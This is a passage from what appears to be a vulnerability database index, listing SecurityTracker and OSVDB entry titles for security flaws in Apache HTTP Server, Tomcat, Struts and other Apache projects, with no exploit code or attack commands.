| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
8330| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
8331| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
8332| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
8333| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
8334| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
8335| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
8336| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
8337| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
8338| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
8339| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
8340| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
8341| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
8342| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
8343| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
8344| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
8345| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
8346| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
8347| [1008920] Apache mod_digest May Validate Replayed Client Responses
8348| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
8349| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
8350| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
8351| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
8352| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
8353| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
8354| [1008030] Apache mod_rewrite Contains a Buffer Overflow
8355| [1008029] Apache mod_alias Contains a Buffer Overflow
8356| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
8357| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
8358| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
8359| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
8360| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
8361| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
8362| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
8363| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
8364| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
8365| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
8366| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
8367| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
8368| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
8369| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
8370| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
8371| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
8372| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
8373| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
8374| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
8375| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
8376| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
8377| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
8378| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
8379| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
8380| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
8381| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
8382| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
8383| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
8384| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
8385| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
8386| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
8387| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
8388| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
8389| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
8390| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
8391| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
8392| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
8393| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overflow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
8394| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
8395| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
8396| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
8397| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
8398| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
8399| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
8400| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
8401| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
8402| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
8403| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
8404| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
8405| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
8406| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
8407| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
8408| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
8409| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
8410| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
8411| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
8412|
8413| OSVDB - http://www.osvdb.org:
8414| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
8415| [96077] Apache CloudStack Global Settings Multiple Field XSS
8416| [96076] Apache CloudStack Instances Menu Display Name Field XSS
8417| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
8418| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
8419| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
8420| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
8421| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
8422| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
8423| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
8424| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
8425| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
8426| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
8427| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
8428| [95599] Apache Continuum web/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
8429| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
8430| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
8431| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
8432| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
8433| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
8434| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
8435| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
8436| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
8437| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
8438| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
8439| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
8440| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
8441| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
8442| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
8443| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
8444| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
8445| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
8446| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
8447| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
8448| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
8449| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
8450| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
8451| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
8452| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
8453| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
8454| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
8455| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
8456| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
8457| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
8458| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
8459| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
8460| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
8461| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
8462| [94279] Apache Qpid CA Certificate Validation Bypass
8463| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
8464| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
8465| [94042] Apache Axis JAX-WS Java Unspecified Exposure
8466| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
8467| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
8468| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
8469| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
8470| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
8471| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
8472| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
8473| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote DoS
8474| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
8475| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
8476| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
8477| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
8478| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
8479| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
8480| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
8481| [93541] Apache Solr json.wrf Callback XSS
8482| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
8483| [93521] Apache jUDDI Security API Token Session Persistence Weakness
8484| [93520] Apache CloudStack Default SSL Key Weakness
8485| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
8486| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
8487| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
8488| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
8489| [93515] Apache HBase table.jsp name Parameter XSS
8490| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
8491| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
8492| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
8493| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
8494| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
8495| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
8496| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
8497| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
8498| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
8499| [93252] Apache Tomcat FORM Authenticator Session Fixation
8500| [93172] Apache Camel camel/endpoints/ Endpoint XSS
8501| [93171] Apache Sling HtmlResponse Error Message XSS
8502| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
8503| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
8504| [93168] Apache Click ErrorReport.java id Parameter XSS
8505| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
8506| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
8507| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
8508| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
8509| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
8510| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
8511| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
8512| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
8513| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
8514| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
8515| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
8516| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
8517| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
8518| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
8519| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
8520| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
8521| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
8522| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
8523| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
8524| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
8525| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
8526| [93144] Apache Solr Admin Command Execution CSRF
8527| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
8528| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
8529| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
8530| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
8531| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
8532| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
8533| [92748] Apache CloudStack VM Console Access Restriction Bypass
8534| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
8535| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
8536| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
8537| [92706] Apache ActiveMQ Debug Log Rendering XSS
8538| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
8539| [92270] Apache Tomcat Unspecified CSRF
8540| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
8541| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
8542| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
8543| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
8544| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
8545| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
8546| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
8547| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
8548| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
8549| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
8550| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
8551| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
8552| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
8553| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
8554| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
8555| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
8556| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
8557| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
8558| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
8559| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
8560| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
8561| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
8562| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
8563| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
8564| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
8565| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
8566| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
8567| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
8568| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
8569| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
8570| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
8571| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
8572| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
8573| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
8574| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
8575| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
8576| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
8577| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
8578| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
8579| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
8580| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
8581| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
8582| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
8583| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
8584| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
8585| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
8586| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
8587| [88095] Apache Tomcat NIO Connector Terminated Connection Infinite Loop DoS
8588| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
8589| [88093] Apache Tomcat Null Session Request CSRF Prevention Filter Bypass
8590| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
8591| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
8592| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
8593| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
8594| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
8595| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
8596| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
8597| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
8598| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
8599| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
8600| [86901] Apache Tomcat Error Message Path Disclosure
8601| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
8602| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
8603| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
8604| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
8605| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
8606| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
8607| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
8608| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
8609| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
8610| [85430] Apache mod_pagespeed Module Unspecified XSS
8611| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
8612| [85249] Apache Wicket Unspecified XSS
8613| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
8614| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
8615| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
8616| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
8617| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
8618| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
8619| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
8620| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
8621| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
8622| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
8623| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
8624| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
8625| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
8626| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
8627| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
8628| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
8629| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
8630| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
8631| [83339] Apache Roller Blogger Roll Unspecified XSS
8632| [83270] Apache Roller Unspecified Admin Action CSRF
8633| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
8634| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
8635| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
8636| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
8637| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
8638| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
8639| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
8640| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
8641| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
8642| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
8643| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
8644| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
8645| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
8646| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
